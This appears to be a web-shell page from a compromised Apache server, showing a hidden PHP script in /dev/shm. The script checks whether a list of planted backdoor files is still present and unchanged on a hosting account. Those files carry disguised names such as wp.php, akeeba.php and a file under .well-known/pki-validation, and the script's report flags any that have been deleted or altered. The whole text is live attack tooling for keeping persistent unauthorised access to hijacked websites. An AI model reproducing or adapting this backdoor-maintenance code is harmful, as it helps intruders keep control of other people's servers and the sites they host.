HEX
Server: Apache
System: Linux whois01.turboservers.com.au 3.10.0-962.3.2.lve1.5.87.el7.x86_64 #1 SMP Tue Jan 28 09:38:56 UTC 2025 x86_64
User: ultimatemeditati (1528)
PHP: 5.6.40
Disabled: exec,passthru,shell_exec,system
Upload Files
File: //dev/shm/.entity
<?php   $r = '/home/adelaid2/public_html'; $x = ["/images/images/images/images/images/search-api/default_category.php"=>"bd@@255919@@631",
"/images/images/images/images/photos/tplsets.php"=>"bd@@255930@@911",
"/Xewu754nMpl97v/c/c/c/nextjs/akeeba.php"=>"bd@@255938@@884",
"/images/images/images/images/7.php"=>"bd@@286919@@888",
"/images/images/images/images/images/wp.php"=>"bd@@289754@@561",
"/reconnect-server/reconnect-server/reconnect-server/upgrades/adr.php"=>"bd@@286942@@601",
"/reconnect-server/reconnect-server/reconnect-server/HMAC.php"=>"bd@@289768@@604",
"/reconnect-server/reconnect-server/sharethis.php"=>"bd@@289774@@1016",
"/cgi-bin/cgi-bin/modifier.php"=>"bd@@289775@@700",
"/.well-known/pki-validation/warpedit2.php"=>"bd@@289778@@855",
"/attention/attention/attention/attention/statics/ods.php"=>"bd@@255932@@929"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');